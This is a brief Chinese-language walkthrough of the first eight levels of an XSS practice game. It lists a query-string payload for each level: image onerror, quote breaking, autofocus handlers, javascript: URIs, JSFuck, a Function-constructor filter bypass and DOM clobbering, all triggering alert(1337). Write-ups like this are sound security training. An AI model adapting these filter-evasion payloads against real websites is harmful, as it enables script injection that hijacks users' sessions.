xss game前八关复现

第一关

 传参进入h2标签

 传入一个alert(1)

 发现没有触发，原因是官方禁用了script

 选择用img标签

?somebody=<img src=1 οnerrοr="alert(1337)">

第二关

 

 先把它的双引号闭合掉，再执行1337再闭合

?jeff=111";alert(1337);"

 第三关

 使用onfocus焦点

 再添加一个autofocus自动聚焦

?wey=1111" οnfοcus=alert(1337) autofocus="

 第四关

 action有一个提交执行，而且还有一个定时器2秒后自动提交

?ricardo=javascript:alert(1337)

第五关

 

 观察后发现需要用到location

?markassbrownlee=<img src=1 οnerrοr=location="javascript:alert%25281337%2529">

第六关

 

 这道题过滤了数字，字母，选择进入jsfuck

 urlcode编码（太长了就不复制了）

第七关

 

 这一题过滤了很多符号，还有函数名，所以使用构造函数，就是用大写后面接.source.toLowerCase()再转成小写

？mafia=Function(/ALERT(1337)/.source.toLowerCase())()

 第八关

 观察发现基本无从下手，选择使用dom破坏

?boomer=<a id=ok href="javascript:alert(1337)">

 失败了，因为过滤框架把javascript过滤了，需要寻找白名单，使用未被过滤的

以下为白名单

 ?boomer=<a id=ok href="tel:alert(1337)">